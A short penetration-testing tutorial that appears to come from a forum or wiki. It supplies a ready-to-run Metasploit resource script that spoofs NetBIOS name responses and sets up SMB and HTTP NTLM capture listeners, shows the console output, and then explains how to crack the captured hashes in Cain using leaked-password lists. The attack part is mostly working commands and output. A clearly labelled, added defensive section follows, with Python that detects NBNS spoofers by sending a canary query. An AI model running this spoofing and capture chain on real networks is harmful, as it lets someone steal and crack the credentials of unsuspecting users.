PenTest-One netbios-resource

1. Create the script: change Your-IP-Address to your IP address and save it as a .rc file. If you use Notepad, save as type All Files with a .rc extension.

#########Highlight and copy from "use auxiliary/server/capture/smb" and stop just after the last "run"#########

use auxiliary/server/capture/smb
set srvhost Your-IP-Address
set cainpwfile /tmp/cain-smb
set johnpwfile /tmp/john-smb
set logfile /tmp/logfile
run
use auxiliary/server/capture/http_ntlm
set srvhost Your-IP-Address
set srvport 80
set uripath /
set cainpwfile /tmp/cain-http
set johnpwfile /tmp/john-http
set logfile /tmp/logfile
run
use auxiliary/spoof/nbns/nbns_response
set spoofip Your-IP-Address
run

#########Don't copy this#########

2. Run it on Kali or BackTrack:

root@kali:~# msfconsole -r /root/Desktop/Metasploit/netbios-resource.rc

Metasploit will start and the script will configure all the required listeners (This is passive!)

root@kali:~# msfconsole -r /root/Desktop/Metasploit/netbios-resource.rc

______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                        http://metasploit.pro |
|______________________________________________________________________________|

Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
-- type 'go_pro' to launch it now.

=[ metasploit v4.7.2-2013110601 [core:4.7 api:1.0]
+ -- --=[ 1226 exploits - 743 auxiliary - 203 post
+ -- --=[ 322 payloads - 30 encoders - 8 nops

[*] Processing /root/Desktop/Metasploit/netbios-resource.rc for ERB directives.
resource (/root/Desktop/Metasploit/netbios-resource.rc)> use auxiliary/server/capture/smb
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set srvhost IP-Address
srvhost => IP-Address
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set cainpwfile /tmp/cain-smb
cainpwfile => /tmp/cain-smb
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set johnpwfile /tmp/john-smb
johnpwfile => /tmp/john-smb
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set logfile /tmp/logfile
logfile => /tmp/logfile
resource (/root/Desktop/Metasploit/netbios-resource.rc)> run
[*] Auxiliary module execution completed
resource (/root/Desktop/Metasploit/netbios-resource.rc)> use auxiliary/server/capture/http_ntlm
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set srvhost IP-Address
srvhost => IP-Address
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set srvport 80
[*] Server started.
srvport => 80
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set uripath /
uripath => /
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set cainpwfile /tmp/cain-http
cainpwfile => /tmp/cain-http
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set johnpwfile /tmp/john-http
johnpwfile => /tmp/john-http
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set logfile /tmp/logfile
logfile => /tmp/logfile
resource (/root/Desktop/Metasploit/netbios-resource.rc)> run
[*] Auxiliary module execution completed
resource (/root/Desktop/Metasploit/netbios-resource.rc)> use auxiliary/spoof/nbns/nbns_response
[*] Using URL: http://IP-Address:80
[*] Server started.
resource (/root/Desktop/Metasploit/netbios-resource.rc)> set spoofip IP-Address
spoofip => IP-Address
resource (/root/Desktop/Metasploit/netbios-resource.rc)> run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) >

---------------------------------------------------------------------

3. Wait; just leave it running and you will see NetBIOS broadcasts. Hashes are stored in /tmp.

4. Open /tmp, open john-http, cain-http, john-smb and logfile, then copy the contents into Notepad and save as .txt.
5. Open Cain in Windows. On the Cracker tab, select LM & NTLM Hashes, then right-click on the page and select Add to list / Import Hashes from a text file.
6. Once loaded, select your password dictionary; a good selection can be found at https://wiki.skullsecurity.org/Passwords (leaked passwords).
7. Right-click on the hash and select Dictionary Attack, choose the hash type (look at the top column to see what the type is), then Start. Personal preference is to untick Num. sub. perms, as this option really slows it down.
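
Defender's view of step 3, as an added example that is not part of the original post: the NBNS spoofer answers broadcast name queries, so a query for a random name that no host registered should get no positive reply on a clean subnet. The Python below builds such a canary query, parses replies and reports any responder; the CNRY prefix, the function names and the broadcast address passed to probe() are assumptions.

```python
import os, socket, struct
# Added example: CNRY, probe() and the other names here are illustrative assumptions.

def encode_name(name, suffix=0x00):
    """RFC 1001 first-level encoding: 16 bytes -> 32 letters in A..P."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))

def build_query(name, txid):
    """Broadcast name query: flags 0x0110 (RD + B), one question, type NB, class IN."""
    head = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return head + b"\x20" + encode_name(name) + b"\x00" + struct.pack(">HH", 0x20, 1)

def parse_response(data):
    """Return (txid, encoded_name, [ips]) for a positive name query response, else None."""
    if len(data) < 62 or data[12] != 0x20:
        return None
    txid, flags, _qd, ancount = struct.unpack(">HHHH", data[:8])
    rtype, _cls, _ttl, rdlen = struct.unpack(">HHIH", data[46:56])
    if not flags & 0x8000 or flags & 0x000F or ancount < 1 or rtype != 0x20:
        return None  # not a response, error rcode, no answer, or not an NB record
    rdata = data[56:56 + rdlen]  # each entry: 2 bytes NB flags + 4 bytes IPv4
    ips = [socket.inet_ntoa(rdata[i + 2:i + 6]) for i in range(0, len(rdata) - 5, 6)]
    return txid, data[13:45], ips

def spoof_alerts(canary, txid, replies):
    """replies: (source_ip, udp_payload) pairs; any positive answer for the canary is suspect."""
    want, alerts = encode_name(canary), []
    for src, payload in replies:
        parsed = parse_response(payload)
        if parsed and parsed[0] == txid and parsed[1] == want:
            alerts.append({"responder": src, "claimed_ips": parsed[2]})
    return alerts

def probe(broadcast, timeout=3.0):
    """Send one canary query to the subnet broadcast address and collect answers."""
    canary, txid = "CNRY" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.settimeout(timeout)
        s.sendto(build_query(canary, txid), (broadcast, 137))
        replies = []
        try:
            while True:
                payload, (src, _port) = s.recvfrom(1024)
                replies.append((src, payload))
        except socket.timeout:
            return spoof_alerts(canary, txid, replies)
```

Run probe() from a monitoring host with the subnet's broadcast address; a non-empty result names the host that answered a name nobody owns.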
